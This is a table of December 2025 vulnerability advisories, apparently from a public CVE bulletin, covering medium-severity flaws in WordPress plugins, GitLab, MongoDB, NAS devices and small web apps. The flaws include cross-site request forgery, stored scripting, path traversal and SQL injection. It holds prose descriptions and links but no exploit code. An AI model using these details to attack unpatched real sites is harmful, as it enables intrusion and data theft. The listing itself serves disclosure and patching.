| frapesce--Rabbit Hole | The Rabbit Hole plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the plugin's reset functionality. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The vulnerability is exacerbated by the fact that the reset operation is performed via a GET request, making exploitation trivial via image tags or hyperlinks. | 2025-12-12 | 4.3 | CVE-2025-13366 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eab5de7e-ddab-4c6f-af87-acce7b5ff15b?source=cve https://plugins.trac.wordpress.org/browser/rabbit-hole/trunk/functions/admin.php#L7 https://plugins.trac.wordpress.org/browser/rabbit-hole/tags/1.1/functions/admin.php#L7 |
| foxtheme--Foxtool All-in-One: Contact chat button, Custom login, Media optimize images | The Foxtool All-in-One: Contact chat button, Custom login, Media optimize images plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.2. This is due to missing or incorrect nonce validation on the foxtool_login_google() function. This makes it possible for unauthenticated attackers to establish an OAuth Connection via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-13408 | https://www.wordfence.com/threat-intel/vulnerabilities/id/40886b66-f6a2-404c-9d0d-5fc3da6a896c?source=cve https://plugins.svn.wordpress.org/foxtool/tags/2.5.2/inc/goo.php https://wordpress.org/plugins/foxtool/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3416529%40foxtool&new=3416529%40foxtool&sfp_email=&sfph_mail= |
| specialk--Simple Download Counter | The Simple Download Counter plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.2.2. This is due to insufficient path validation in the `simple_download_counter_parse_path()` function. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which may contain sensitive information such as database credentials (wp-config.php) or system files. Please note that the vendor opted to continue to allow remote file downloads from arbitrary locations on the server, however, has disabled this functionality on multi-sites and provided a warning to site owners in the readme.txt when they install the plugin. While not an optimal patch, we have considered this sufficient and recommend users proceed to use the plugin with caution. | 2025-12-10 | 4.9 | CVE-2025-13677 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b82a0f71-29d7-469a-8c69-5ab68d599cb9?source=cve https://plugins.trac.wordpress.org/browser/simple-download-counter/trunk/inc/functions-admin.php#L566 https://plugins.trac.wordpress.org/browser/simple-download-counter/tags/2.2.2/inc/functions-admin.php#L566 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3409876%40simple-download-counter&new=3409876%40simple-download-counter&sfp_email=&sfph_mail= |
| maartenbelmans--Advanced Product Fields (Product Addons) for WooCommerce | The Advanced Product Fields (Product Addons) for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.17. This is due to missing or incorrect nonce validation on the 'maybe_duplicate' function. This makes it possible for unauthenticated attackers to duplicate and publish product field groups, including draft and pending field groups, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-09 | 4.3 | CVE-2025-13924 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f8906333-7024-40d3-91cd-2ecbbf20314f?source=cve https://github.com/Baodaica/advanced-product-fields-for-woocommerce/blob/main/class-admin-controller.php#L130-L133 https://plugins.trac.wordpress.org/changeset/3411740/ |
| thewellnessway--TWW Protein Calculator | The TWW Protein Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Header' setting in all versions up to, and including, 1.0.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-12 | 4.4 | CVE-2025-13971 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b57749db-0a47-44f8-8607-d0d962c5ced2?source=cve https://plugins.trac.wordpress.org/browser/twwc-protein/tags/1.0.24/templates/protein-calculator-compact.php#L19 https://plugins.trac.wordpress.org/browser/twwc-protein/tags/1.0.24/templates/protein-calculator-large.php#L32 https://plugins.trac.wordpress.org/browser/twwc-protein/trunk/templates/protein-calculator-compact.php#L19 https://plugins.trac.wordpress.org/browser/twwc-protein/trunk/templates/protein-calculator-large.php#L32 |
| watchtowerhq--WatchTowerHQ | The WatchTowerHQ plugin for WordPress is vulnerable to arbitrary file read via the 'wht_download_big_object_origin' parameter in all versions up to, and including, 3.15.0. This is due to insufficient path validation in the handle_big_object_download_request function. This makes it possible for authenticated attackers, with administrator-level access and a valid access token, to read arbitrary files on the server, which can contain sensitive information such as database credentials and authentication keys. | 2025-12-12 | 4.9 | CVE-2025-13972 | https://www.wordfence.com/threat-intel/vulnerabilities/id/13fcbff8-8560-48ca-82df-8b620961d9c6?source=cve https://plugins.trac.wordpress.org/browser/watchtowerhq/tags/3.15.0/src/Download.php#L104 https://plugins.trac.wordpress.org/browser/watchtowerhq/trunk/src/Download.php#L104 |
| izuchy--Contact Form 7 with ChatWork | The Contact Form 7 with ChatWork plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'api_token' and 'roomid' settings in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses the settings page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-12 | 4.4 | CVE-2025-13975 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f5d8616b-8757-426e-a4ae-bd851d35e296?source=cve https://plugins.trac.wordpress.org/browser/contact-form-7-with-chatwork/tags/1.1.0/contact-form-7-chatwork.php#L80 https://plugins.trac.wordpress.org/browser/contact-form-7-with-chatwork/tags/1.1.0/contact-form-7-chatwork.php#L89 https://plugins.trac.wordpress.org/browser/contact-form-7-with-chatwork/trunk/contact-form-7-chatwork.php#L80 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.5 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to discover, through API requests, the names of private projects they do not have access to. | 2025-12-11 | 4.3 | CVE-2025-13978 | https://gitlab.com/gitlab-org/gitlab/-/work_items/566960 GitLab Issue #566960 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| codnloc--Purchase and Expense Manager | The Purchase and Expense Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.2. This is due to missing nonce validation on the 'sup_pt_handle_deletion' function. This makes it possible for unauthenticated attackers to delete arbitrary purchase records via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-13987 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c9826506-2292-44a7-9564-832e54bf4fba?source=cve https://plugins.trac.wordpress.org/browser/purchase-and-expense-manager/trunk/purchase-and-expense-manager.php#L604 https://plugins.trac.wordpress.org/browser/purchase-and-expense-manager/tags/1.1.2/purchase-and-expense-manager.php#L604 |
| jeremybmerrill--DebateMaster | The DebateMaster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the color options in the plugin settings in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses a page with the debate shortcode. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-12 | 4.4 | CVE-2025-14035 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a68cb059-972f-473d-90cb-41ccda052b08?source=cve https://wordpress.org/plugins/debatemaster/ https://plugins.trac.wordpress.org/browser/debatemaster/trunk/debatemaster.php#L30 https://plugins.trac.wordpress.org/browser/debatemaster/tags/1.0.0/debatemaster.php#L30 https://plugins.trac.wordpress.org/browser/debatemaster/trunk/debatemaster.php#L87 https://plugins.trac.wordpress.org/browser/debatemaster/tags/1.0.0/debatemaster.php#L87 |
| apprhyme--URL Media Uploader | The URL Media Uploader plugin for WordPress is vulnerable to unauthorized safe file uploads due to a missing capability check on the url_media_uploader_url_upload_ajax_handler() function in all versions up to, and including, 1.0.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload safe media files. | 2025-12-12 | 4.3 | CVE-2025-14045 | https://www.wordfence.com/threat-intel/vulnerabilities/id/57f09da9-0d2c-45db-b3ed-19a7c9f5a001?source=cve https://plugins.trac.wordpress.org/browser/url-media-uploader/trunk/url-media-uploader.php#L52 https://gist.github.com/jasoncarle/925401bb11833b1ced2342390e20718e https://plugins.trac.wordpress.org/browser/url-media-uploader/tags/1.0.1/url-media-uploader.php#L52 |
| jonahsc--SimplyConvert | The SimplyConvert plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'simplyconvert_hash' option in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 4.4 | CVE-2025-14048 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2d720466-e470-46a3-8129-3e58e1928f0d?source=cve https://plugins.trac.wordpress.org/browser/simplyconvert/trunk/simplyconvert.php#L137 https://plugins.trac.wordpress.org/browser/simplyconvert/tags/1.0/simplyconvert.php#L137 |
| uxl--Design Import/Export Styles, Templates, Template Parts and Patterns | The Design Import/Export plugin for WordPress is vulnerable to SQL Injection via XML File Import in all versions up to, and including, 2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-13 | 4.9 | CVE-2025-14050 | https://www.wordfence.com/threat-intel/vulnerabilities/id/beb489d3-2c1b-4af5-b73e-126d2526e0a3?source=cve https://plugins.trac.wordpress.org/browser/design-import-export/trunk/includes/importer.php#L162 https://plugins.trac.wordpress.org/browser/design-import-export/tags/2.2/includes/importer.php#L162 https://plugins.trac.wordpress.org/changeset/3416324 |
| webdevstudios--Custom Post Type UI | The Custom Post Type UI plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'label' parameter during custom post type import in all versions up to, and including, 1.18.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses the Tools → Get Code page. | 2025-12-13 | 4.4 | CVE-2025-14056 | https://www.wordfence.com/threat-intel/vulnerabilities/id/890c743e-da5e-46ed-a011-cecd24778163?source=cve https://plugins.trac.wordpress.org/browser/custom-post-type-ui/trunk/inc/tools-sections/tools-post-types.php#L201 https://plugins.trac.wordpress.org/browser/custom-post-type-ui/tags/1.18.1/inc/tools-sections/tools-post-types.php#L201 https://github.com/WebDevStudios/custom-post-type-ui/pull/1014/files#diff-bd3331205024f12a78d74b312bc4f5ad118b5734999bf53a4a95e0959891f60a |
| tekafran--Animated Pixel Marquee Creator | The Animated Pixel Marquee Creator plugin for WordPress is vulnerable to Cross-Site Request Forgery via the 'marquee' parameter in all versions up to, and including, 1.0.0. This is due to missing nonce validation on the marquee deletion function. This makes it possible for unauthenticated attackers to delete arbitrary marquees via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14062 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c727ab41-c091-4fff-8abe-f52a904cd9f0?source=cve https://plugins.trac.wordpress.org/browser/animated-pixel-marquee-creator/trunk/admin/marquees_list.php#L44 https://plugins.trac.wordpress.org/browser/animated-pixel-marquee-creator/tags/1.0.0/admin/marquees_list.php#L44 |
| octagonsimon--Coding Blocks | The Coding Blocks plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update plugin settings including the theme configuration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14158 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5a4833de-d530-4bbf-ac28-e5d4b5f68f1e?source=cve https://plugins.trac.wordpress.org/browser/coding-blocks/trunk/admin/pages/settings.php#L11 https://plugins.trac.wordpress.org/browser/coding-blocks/tags/1.1.0/admin/pages/settings.php#L11 https://wordpress.org/plugins/coding-blocks/#developers |
| ays-pro--Secure Copy Content Protection and Content Locking | The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.9.2. This is due to missing nonce validation on the 'ays_sccp_results_export_file' AJAX action. This makes it possible for unauthenticated attackers to export sensitive plugin data including email addresses, IP addresses, physical addresses, user IDs, and other user information via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The exported data is stored in a publicly accessible file, allowing attackers to receive the sensitive information even though they are not authenticated. | 2025-12-12 | 4.3 | CVE-2025-14159 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7cffe04e-a2e5-4752-a5c1-7c95f0007e0b?source=cve https://wordpress.org/plugins/secure-copy-content-protection/#developers https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.8.7/admin/class-secure-copy-content-protection-admin.php#L645 https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.9.3/admin/class-secure-copy-content-protection-admin.php#L696 |
| justdave--Upcoming for Calendly | The Upcoming for Calendly plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.4. This is due to missing nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update the plugin's Calendly API key via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14160 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d66d6f36-ad16-40ba-b32f-f4aff6f8b494?source=cve https://plugins.trac.wordpress.org/browser/upcoming-for-calendly/trunk/includes/settings.php#L33 https://plugins.trac.wordpress.org/browser/upcoming-for-calendly/tags/1.2.4/includes/settings.php#L33 https://wordpress.org/plugins/upcoming-for-calendly/#developers https://plugins.trac.wordpress.org/changeset/3415892/ |
| truefy--Truefy Embed | The Truefy Embed plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing nonce validation on the 'truefy_embed_options_update' settings update action. This makes it possible for unauthenticated attackers to update the plugin's settings, including the API key, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14161 | https://www.wordfence.com/threat-intel/vulnerabilities/id/74ad664d-5cfa-481c-a318-30999c43e4ac?source=cve https://plugins.trac.wordpress.org/browser/truefy-embed/trunk/truefy.php#L431 https://plugins.trac.wordpress.org/browser/truefy-embed/tags/1.1.0/truefy.php#L431 |
| magblogapi--BMLT WordPress Plugin | The BMLT WordPress Plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.11.4. This is due to missing nonce validation on the 'BMLTPlugin_create_option' and 'BMLTPlugin_delete_option' actions. This makes it possible for unauthenticated attackers to create new plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14162 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0344f49b-f5f9-4729-ade0-cba6289406de?source=cve https://plugins.trac.wordpress.org/browser/bmlt-wordpress-satellite-plugin/trunk/vendor/bmlt/bmlt-satellite-base-class/bmlt-cms-satellite-plugin.php#L848 https://plugins.trac.wordpress.org/browser/bmlt-wordpress-satellite-plugin/tags/3.11.4/vendor/bmlt/bmlt-satellite-base-class/bmlt-cms-satellite-plugin.php#L848 |
| developerke--Kirim.Email WooCommerce Integration | The Kirim.Email WooCommerce Integration plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.9. This is due to missing nonce validation on the plugin's settings page. This makes it possible for unauthenticated attackers to modify the plugin's API credentials and integration settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14165 | https://www.wordfence.com/threat-intel/vulnerabilities/id/70993f6f-d9b0-49d5-b35e-e129f96529f6?source=cve https://plugins.trac.wordpress.org/browser/kirimemail-woocommerce-integration/trunk/includes/class-kirimemail-woocommerce.php#L113 https://plugins.trac.wordpress.org/browser/kirimemail-woocommerce-integration/tags/1.2.9/includes/class-kirimemail-woocommerce.php#L113 https://plugins.trac.wordpress.org/browser/kirimemail-woocommerce-integration/trunk/includes/class-kirimemail-woocommerce.php#L137 https://plugins.trac.wordpress.org/browser/kirimemail-woocommerce-integration/tags/1.2.9/includes/class-kirimemail-woocommerce.php#L137 |
| Campcodes--Retro Basketball Shoes Online Store | A weakness has been identified in Campcodes Retro Basketball Shoes Online Store 1.0. The impacted element is an unknown function of the file /admin/admin_running.php. Executing manipulation of the argument product_image can lead to unrestricted upload. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-12-08 | 4.7 | CVE-2025-14219 | VDB-334661 | Campcodes Retro Basketball Shoes Online Store admin_running.php unrestricted upload VDB-334661 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701209 | Campcodes Retro Basketball Shoes Online Store V1.0 Unrestricted Upload https://github.com/yyue02/cve/issues/1 https://www.campcodes.com/ |
| ORICO--CD3510 | A security vulnerability has been detected in ORICO CD3510 1.9.12. This affects an unknown function of the component File Upload. The manipulation leads to path traversal. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-08 | 4.3 | CVE-2025-14220 | VDB-334662 | ORICO CD3510 File Upload path traversal VDB-334662 | CTI Indicators (IOB, IOC, TTP) Submit #701302 | ORICO CD3510 NAS V1.9.12 Incorrect Access Control https://www.notion.so/2b66cf4e528a8002aa39df57a71b105a |
| Yottamaster--DM2 | A vulnerability was found in Yottamaster DM2, DM3 and DM200 up to 1.2.23/1.9.12. Affected by this issue is some unknown functionality of the component File Upload. Performing manipulation results in path traversal. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-08 | 4.3 | CVE-2025-14224 | VDB-334666 | Yottamaster DM2/DM3/DM200 File Upload path traversal VDB-334666 | CTI Indicators (IOB, IOC, TTP) Submit #701673 | Yottamaster DM200 V1.2.23 Vertical Privilege Escalation https://www.notion.so/2b76cf4e528a80f6ae50fe21b13ff0b8 |
| SourceCodester--Inventory Management System | A security vulnerability has been detected in SourceCodester Inventory Management System 1.0. The affected element is an unknown function of the component SVC Report Export. Such manipulation leads to csv injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-12-08 | 4.7 | CVE-2025-14229 | VDB-334671 | SourceCodester Inventory Management System SVC Report Export csv injection VDB-334671 | CTI Indicators (IOB, IOC) Submit #702119 | SourceCodester Inventory Management System 1.0 CSV Injection https://www.notion.so/Spreadsheet-Formula-Injection-Leading-to-Remote-Code-Execution-in-SourceCodester-Inventory-Managemen-2b723917db8c80dfaaabe2b74d6f283d?source=copy_link https://www.sourcecodester.com/ |
| Galaxy Software Services--Vitals ESP | Vitals ESP developed by Galaxy Software Services has an Arbitrary File Read vulnerability, allowing privileged remote attackers to exploit Absolute Path Traversal to download arbitrary system files. | 2025-12-08 | 4.9 | CVE-2025-14253 | https://www.twcert.org.tw/tw/cp-132-10542-4c682-1.html https://www.twcert.org.tw/en/cp-139-10543-380bd-2.html |
| gallerycreator--Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery | The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to unauthorized modification of plugin settings in all versions up to, and including, 3.3.0. This is due to the plugin using the `edit_posts` capability check instead of `manage_options` for the `update_option` action type in the `pgc_sgb_action_wizard` AJAX handler. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify arbitrary plugin settings prefixed with `pgc_sgb_*`. | 2025-12-13 | 4.3 | CVE-2025-14288 | https://www.wordfence.com/threat-intel/vulnerabilities/id/60ab0311-888c-46ae-98fe-9e7d4dfe13bf?source=cve https://plugins.trac.wordpress.org/browser/simply-gallery-block/tags/3.2.8/plugin.php#L593 https://plugins.trac.wordpress.org/changeset/3418101/simply-gallery-block/trunk/plugin.php?old=3415010&old_path=simply-gallery-block%2Ftrunk%2Fplugin.php |
| MongoDB Inc.--MongoDB Server | A post-authentication flaw in the network two-phase commit protocol used for cross-shard transactions in MongoDB Server may lead to logical data inconsistencies under specific conditions which are not predictable and exist for a very short period of time. This error can cause the transaction coordination logic to misinterpret the transaction as committed, resulting in inconsistent state on those shards. This may lead to low integrity and availability impact. This issue impacts MongoDB Server v8.0 versions prior to 8.0.16, MongoDB Server v7.0 versions prior to 7.0.26 and MongoDB server v8.2 versions prior to 8.2.2. | 2025-12-09 | 4.2 | CVE-2025-14345 | https://jira.mongodb.org/browse/SERVER-106075 |
| doubledome--Resource Library for Logged In Users | The Resource Library for Logged In Users plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing nonce validation on multiple administrative functions. This makes it possible for unauthenticated attackers to perform various unauthorized actions including creating, editing, and deleting resources and categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14354 | https://www.wordfence.com/threat-intel/vulnerabilities/id/71b82f1e-14ae-4eb3-9b46-5fcea1cd5a32?source=cve https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/trunk/includes/class-ddrll.php#L406 https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/tags/1.4/includes/class-ddrll.php#L406 https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/trunk/includes/class-ddrll.php#L168 https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/tags/1.4/includes/class-ddrll.php#L168 https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/trunk/includes/class-ddrll.php#L530 https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/tags/1.4/includes/class-ddrll.php#L530 |
| themefic--Ultra Addons for Contact Form 7 | The Ultra Addons for Contact Form 7 plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'uacf7_get_generated_pdf' function in all versions up to, and including, 3.5.33. This makes it possible for authenticated attackers, with Subscriber-level access and above, to generate and retrieve form submission PDFs when the "PDF Generator" and the "Database" addons are enabled (both disabled by default). | 2025-12-12 | 4.3 | CVE-2025-14356 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3af9ece0-1556-4457-87ee-343daec5e74f?source=cve https://plugins.trac.wordpress.org/browser/ultimate-addons-for-contact-form-7/trunk/addons/pdf-generator/pdf-generator.php#L316 https://plugins.trac.wordpress.org/browser/ultimate-addons-for-contact-form-7/trunk/addons/pdf-generator/pdf-generator.php#L321 https://plugins.trac.wordpress.org/browser/ultimate-addons-for-contact-form-7/trunk/addons/pdf-generator/pdf-generator.php#L341 https://plugins.trac.wordpress.org/browser/ultimate-addons-for-contact-form-7/trunk/addons/pdf-generator/pdf-generator.php#L53 https://plugins.trac.wordpress.org/changeset/3417590/ultimate-addons-for-contact-form-7 |
| themeregion--Quick Testimonials | The Quick Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-13 | 4.4 | CVE-2025-14378 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1907308f-a722-48ce-8da4-a6c21ee29575?source=cve https://wordpress.org/plugins/quick-testimonials/ |
| darendev--Simple Theme Changer | The Simple Theme Changer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14391 | https://www.wordfence.com/threat-intel/vulnerabilities/id/efa9b44d-8b6c-4a11-82af-cecc2c202024?source=cve https://plugins.trac.wordpress.org/browser/simple-theme-changer/tags/1.0/class_theme_changer.php#L262 |
| darendev--Simple Theme Changer | The Simple Theme Changer plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the user_theme_admin, display_method_admin, and set_change_theme_button_name actions in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the plugin's settings. | 2025-12-12 | 4.3 | CVE-2025-14392 | https://www.wordfence.com/threat-intel/vulnerabilities/id/880712ee-373f-49e7-93e3-968f3a0f3f83?source=cve https://plugins.trac.wordpress.org/browser/simple-theme-changer/tags/1.0/class_theme_changer.php#L262 |
| melodicmedia--Popover Windows | The Popover Windows plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-13 | 4.3 | CVE-2025-14394 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c2af263f-960b-4807-bc85-d136136fa30f?source=cve https://plugins.trac.wordpress.org/browser/popover-windows/tags/1.2/popoveroptions.php#L98 |
| melodicmedia--Popover Windows | The Popover Windows plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on multiple ajax actions (e.g., pop_submit, poptheme_submit) in all versions up to, and including, 1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the plugin's settings and content. | 2025-12-13 | 4.3 | CVE-2025-14395 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0cae43cb-a0b7-4067-95b3-26fec31ebf42?source=cve https://plugins.trac.wordpress.org/browser/popover-windows/tags/1.2/popoveroptions.php#L98 |
| solutionsbysteve--Solutions Ad Manager | The Solutions Ad Manager plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.0.0. This is due to insufficient validation on the redirect URL supplied via the 'sam-redirect-to' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. | 2025-12-13 | 4.7 | CVE-2025-14451 | https://www.wordfence.com/threat-intel/vulnerabilities/id/696495c5-c8f8-4790-af89-1ee911767b1b?source=cve https://plugins.trac.wordpress.org/browser/solutions-ad-manager/trunk/public/class-solutions-ad-manager-public.php#L30 https://plugins.trac.wordpress.org/browser/solutions-ad-manager/tags/1.0.0/public/class-solutions-ad-manager-public.php#L30 |
| ays-pro--Image Slider by Ays- Responsive Slider and Carousel | The Image Slider by Ays- Responsive Slider and Carousel plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.0. This is due to missing or incorrect nonce validation on the bulk delete functionality. This makes it possible for unauthenticated attackers to delete arbitrary sliders via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-13 | 4.3 | CVE-2025-14454 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e211df80-aab7-43a1-8c11-a472f90ef4c6?source=cve https://plugins.trac.wordpress.org/browser/ays-slider/trunk/includes/lists/class-ays-slider-list-table.php#L430 https://plugins.trac.wordpress.org/browser/ays-slider/tags/2.7.0/includes/lists/class-ays-slider-list-table.php#L430 https://plugins.trac.wordpress.org/changeset/3417916/ays-slider/tags/2.7.1/includes/lists/class-ays-slider-list-table.php?old=3278880&old_path=ays-slider%2Ftags%2F2.7.0%2Fincludes%2Flists%2Fclass-ays-slider-list-table.php |
| owais4377--Lucky Draw Contests | The Lucky Draw Contests plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2. This is due to missing or incorrect nonce validation in misc-settings.php. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-13 | 4.3 | CVE-2025-14462 | https://www.wordfence.com/threat-intel/vulnerabilities/id/49364a21-775a-4de0-84f8-e62aa1a5fefd?source=cve https://plugins.trac.wordpress.org/browser/lucky-draw/tags/4.2/includes/misc-settings.php |
| wpjobportal--WP Job Portal AI-Powered Recruitment System for Company or Job Board website | The WP Job Portal plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.3.9. This is due to the plugin explicitly whitelisting the `<script>` tag in its `WPJOBPORTAL_ALLOWED_TAGS` configuration and using insufficient input sanitization when saving job descriptions. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts into job description fields via the job creation/editing interface. These scripts will execute whenever a user accesses an injected page, enabling session hijacking, credential theft, and other malicious activities. This only impacts multi-site installations, or those with unfiltered_html disabled. | 2025-12-12 | 4.4 | CVE-2025-14467 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c347b9f-d297-4cb5-9c4a-1001d845ed5a?source=cve https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.3.9/includes/constants.php#L351 https://plugins.trac.wordpress.org/browser/wp-job-portal/trunk/includes/constants.php#L351 https://plugins.trac.wordpress.org/browser/wp-job-portal/trunk/modules/job/model.php#L1278 https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.3.9/modules/job/model.php#L1278 https://plugins.trac.wordpress.org/browser/wp-job-portal/trunk/modules/job/tmpl/views/frontend/title.php#L231 https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.3.9/modules/job/tmpl/views/frontend/title.php#L231 |
